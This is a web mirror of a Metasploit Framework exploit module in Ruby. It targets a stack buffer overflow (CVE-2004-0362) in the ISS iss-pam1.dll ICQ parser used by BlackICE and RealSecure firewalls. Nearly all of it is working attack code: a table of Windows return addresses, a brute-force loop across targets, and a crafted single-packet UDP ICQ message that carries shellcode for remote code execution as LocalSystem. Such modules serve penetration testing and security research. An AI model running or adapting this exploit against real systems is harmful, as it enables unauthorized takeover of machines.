CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/firewall/blackice_pam_icq.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in the ISS products that use

16
        the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation

17
        will result in arbitrary code execution as LocalSystem. This exploit

18
        only requires 1 UDP packet, which can be both spoofed and sent to a broadcast

19
        address.

20


21
        The ISS exception handler will recover the process after each overflow, giving

22
        us the ability to bruteforce the service and exploit it multiple times.

23
      },

24
      'Author'         => 'spoonm',

25
      'License'        => MSF_LICENSE,

26
      'References'     =>

27
        [

28
          ['CVE', '2004-0362'],

29
          ['OSVDB', '4355'],

30
          ['URL',   'http://www.eeye.com/html/Research/Advisories/AD20040318.html']

31
        ],

32
      'Payload'        =>

33
        {

34
          'Space'           => 504-31-4,

35
          'BadChars'        => "\x00",

36
          'MinNops'         => 0,

37
          'MaxNops'         => 0,

38
          'StackAdjustment' => -3500

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          [ 'Bruteforce',                   {  } ],

44
          [ 'Bruteforce iis-pam1.dll',      { 'Targets' => 3 .. 4  } ],

45
          [ 'Bruteforce NT 4.0',            { 'Targets' => 5 .. 15 } ],

46
          [ 'iis-pam1.dll 3.6.06',          { 'Ret' => 0x5e0a47ef } ],

47
          [ 'iis-pam1.dll 3.6.11',          { 'Ret' => 0x5e0da1db } ],

48
          [ 'WinNT SP3/SP4/SP5',            { 'Ret' => 0x777e79ab } ],

49
          [ 'WinNT SP4/SP5',                { 'Ret' => 0x7733b8db } ],

50
          [ 'WinNT SP5/SP6 - advapi32',     { 'Ret' => 0x77dcd1cb } ],

51
          [ 'WinNT SP3/SP5/SP6 - shell32',  { 'Ret' => 0x77cec080 } ],

52
          [ 'WinNT SP5/SP6 - mswsock',      { 'Ret' => 0x7767ebca } ],

53
          [ 'WinXP SP0/SP1 - shell32',      { 'Ret' => 0x776606af } ],

54
          [ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76b305a7 } ],

55
          [ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76e61a21 } ],

56
          [ 'WinXP SP0/SP1 - ws2_32',       { 'Ret' => 0x71ab7bfb } ],

57
          [ 'WinXP SP0/SP1 - mswsock',      { 'Ret' => 0x71a5403d } ],

58
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],

59
          [ 'Win2000 SP0 - SP4',            { 'Ret' => 0x750231e2 } ],

60
          [ 'Win2000 SP2/SP3 - samlib',     { 'Ret' => 0x75159da3 } ],

61
          [ 'Win2000 SP0/SP1 - activeds',   { 'Ret' => 0x77ed0beb } ],

62
          [ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],

63
          [ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],

64
          [ 'WinXP SP0 - SP1',              { 'Ret' => 0x71aa3a4b } ],

65
          [ 'Win2003 SP0',                  { 'Ret' => 0x71bf3cc9 } ],

66
        ],

67
      'DisclosureDate' => '2004-03-18',

68
      'DefaultTarget'  => 0))

69


70
    register_options(

71
      [

72
        Opt::RPORT(1)

73
      ])

74
  end

75


76
  def exploit

77
    datastore['RPORT'] = rand(65536) if rport == 1

78


79
    targs = [ target ]

80


81
    if target.name =~ /^Brute/

82
      if target['Targets']

83
        targs = []

84


85
        target['Targets'].each { |idx|

86
          targs << targets[idx]

87
        }

88
      else

89
        targs = targets.dup

90


91
        targs.delete_at(0)

92
        targs.delete_at(0)

93
        targs.delete_at(0)

94
      end

95
    end

96


97
    targs.each { |targ|

98
      print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

99


100
      shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)

101
      email     = rand_text_english(19) + [targ.ret].pack('V') + shellcode

102


103
      # Hopefully this structure is correct -- ported from msf 2.  Blame me

104
      # (skape) if it doesn't work!

105
      packet    =

106
        # SRV_MULTI

107
        [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +

108
        # SRV_USER_ONLINE

109
        [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +

110
        [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +

111
        # SRV_META_USER

112
        [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +

113
        "\x00\x00\x0a" + # subcommand / success

114
        "\x00\x00"     + # nick length / nick

115
        "\x00\x00"     + # first length / first

116
        "\x00\x00"     + # last length / last

117
        [email.length].pack('v') + email +

118
        "\x00\x00\x00\x00\x00\x00\x00"

119


120
      print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

121


122
      connect_udp(true, { 'CPORT' => 4000 })

123
      udp_sock.put(packet)

124
      disconnect_udp

125


126
      print_status("Sleeping (giving exception handler time to recover)")

127


128
      select(nil,nil,nil,5)

129
    }

130
  end

131
end

132


133